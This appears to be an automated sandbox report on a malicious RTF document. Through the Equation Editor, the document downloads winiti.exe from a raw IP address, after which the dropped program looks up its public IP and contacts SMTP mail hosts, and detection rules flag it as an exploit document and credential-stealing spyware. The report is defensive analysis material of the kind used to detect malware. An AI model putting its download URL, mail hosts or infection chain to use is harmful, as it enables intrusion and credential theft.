00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: Joe Sandbox ViewIP Address: 208.91.198.143 208.91.198.143
                    Source: Joe Sandbox ViewIP Address: 208.91.199.225 208.91.199.225
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                    Source: C:\Users\user\AppData\Roaming\winiti.exeDNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\winiti.exeDNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\winiti.exeDNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\winiti.exeDNS query: name: api.ipify.org
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.91.199.224:25
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.91.199.225:25
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.91.199.223:25
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 208.91.198.143:25
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /71/winiti.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.174.139Connection: Keep-Alive
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.46.174.139
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B73513B2-3E0D-42E7-B536-2812A501893B}.tmpJump to behavior
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /71/winiti.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.174.139Connection: Keep-Alive
                    Source: winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: smtp.jlahuachem.com
                    Source: EQNEDT32.EXE, 00000002.00000002.363861169.000000000032B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.174.139/71/winiti.
                    Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.363861169.00000000002EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.174.139/71/winiti.exe
                    Source: EQNEDT32.EXE, 00000002.00000002.363861169.00000000002EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.174.139/71/winiti.exej
                    Source: EQNEDT32.EXE, 00000002.00000002.363861169.00000000002EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.174.139/71/winiti.exekkC:
                    Source: winiti.exe, 00000006.00000002.715091782.000000000594C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                    Source: winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                    Source: winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                    Source: winiti.exe, 00000006.00000002.715091782.000000000594C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                    Source: winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                    Source: winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                    Source: winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                    Source: winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                    Source: winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                    Source: winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                    Source: winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                    Source: winiti.exe, 00000006.00000002.714490437.0000000002231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: winiti.exe, 00000006.00000002.714490437.0000000002358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.jlahuachem.com
                    Source: winiti.exe.2.dr, winiti[1].exe.2.drString found in binary or memory: http://tempuri.org/dxsss.xsd
                    Source: winiti.exe, 00000006.00000002.714490437.0000000002358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                    Source: winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                    Source: winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                    Source: winiti.exe, 00000005.00000002.375360921.0000000003489000.00000004.00000800.00020000.00000000.sdmp, winiti.exe, 00000006.00000002.714090429.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: winiti.exe, 00000005.00000002.375360921.0000000003489000.00000004.00000800.00020000.00000000.sdmp, winiti.exe, 00000006.00000002.714090429.0000000000402000.00000040.00000400.00020000.00000000.sdmp, winiti.exe, 00000006.00000002.714490437.0000000002231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: winiti.exe, 00000006.00000002.714490437.0000000002231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: winiti.exe, 00000006.00000002.714490437.0000000002231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                    Source: winiti.exe, 00000006.00000002.714490437.0000000002280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.22:49164 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: 5.2.winiti.exe.3489570.4.raw.unpack, SKTzxzsJw.cs.Net Code: agneM
                    Source: 5.2.winiti.exe.34c5b90.7.raw.unpack, SKTzxzsJw.cs.Net Code: agneM

                    System Summary

                    barindex
                    Source: 2FBexXRCHR.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                    Source: 5.2.winiti.exe.34c5b90.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 5.2.winiti.exe.3489570.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 6.2.winiti.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 5.2.winiti.exe.34c5b90.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 5.2.winiti.exe.3489570.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exeJump to dropped file
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\winiti.exeJump to dropped file
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 5_2_001905085_2_00190508
                    Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 5_2_0019D0D05_2_0019D0D0
                    Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 5_2_0019117E5_2_0019117E
                    Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 5_2_0019D5085_2_0019D508
                    Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 5_2_0019D9F05_2_0019D9F0
                    Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 5_2_0019D9E15_2_0019D9E1
                    Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 5_2_0019CC985_2_0019CC98
                    Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 5_2_0019DE285_2_0019DE28
                    Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_002DC0506_2_002DC050
                    Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_002D39086_2_002D3908
                    Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_002DF3586_2_002DF358
                    Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_002D45206_2_002D4520
                    Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_002D3C456_2_002D3C45
                    Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_002D3C506_2_002D3C50
                    Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_007265606_2_00726560
                    Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_007256096_2_00725609
                    Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_0072B6406_2_0072B640
                    Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_00721A486_2_00721A48
                    Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_0072B2806_2_0072B280
                    Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 6_2_007287906_2_00728790
                    Source: 2FBexXRCHR.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                    Source: 5.2.winiti.exe.34c5b90.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.winiti.exe.3489570.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 6.2.winiti.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.winiti.exe.34c5b90.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.winiti.exe.3489570.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: winiti[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: winiti.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 5.2.winiti.exe.3489570.4.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 5.2.winiti.exe.3489570.4.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 5.2.winiti.exe.3489570.4.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 5.2.winiti.exe.3489570.4.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 5.2.winiti.exe.3489570.4.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 5.2.winiti.exe.3489570.4.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 5.2.winiti.exe.3489570.4.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 5.2.winiti.exe.3489570.4.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 5.2.winiti.exe.37cc870.5.raw.unpack, X1lGeNtrqa9RypnK1A.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 5.2.winiti.exe.384a690.6.raw.unpack, wY0JxeJBuhumsKEEdp.csSecurity API names: _0020.SetAccessControl
                    Source: 5.2.winiti.exe.384a690.6.raw.unpack, wY0JxeJBuhumsKEEdp.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 5.2.winiti.exe.384a690.6.raw.unpack, wY0JxeJBuhumsKEEdp.csSecurity API names: _0020.AddAccessRule
                    Source: 5.2.winiti.exe.52e0000.8.raw.unpack, wY0JxeJBuhumsKEEdp.csSecurity API names: _0020.SetAccessControl
                    Source: 5.2.winiti.exe.52e0000.8.raw.unpack, wY0JxeJBuhumsKEEdp.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 5.2.winiti.exe.52e0000.8.raw.unpack, wY0JxeJBuhumsKEEdp.csSecurity API names: _0020.AddAccessRule
                    Source: 5.2.winiti.exe.52e0000.8.raw.unpack, X1lGeNtrqa9RypnK1A.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 5.2.winiti.exe.384a690.6.raw.unpack, X1lGeNtrqa9RypnK1A.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 5.2.winiti.exe.37cc870.5.raw.unpack, wY0JxeJBuhumsKEEdp.csSecurity API names: _0020.SetAccessControl
                    Source: 5.2.winiti.exe.37cc870.5.raw.unpack, wY0JxeJBuhumsKEEdp.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 5.2.winiti.exe.37cc870.5.raw.unpack, wY0JxeJBuhumsKEEdp.csSecurity API names: _0020.AddAccessRule
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winRTF@7/9@4/6
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$BexXRCHR.rtfJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeMutant created: NULL
                    Source: C:\Users\user\AppData\Roaming\winiti.exeMutant created: \Sessions\1\BaseNamedObjects\nDULVUQYKBSQmTmUguHVQEG
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR83BF.tmpJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\winiti.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: 2FBexXRCHR.rtfVirustotal: Detection: 52%
                    Source: 2FBexXRCHR.rtfReversingLabs: Detection: 47%
                    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"Jump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: wbemcomn2.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: ntdsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: credssp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: rasadhlp.dllJump to behavior
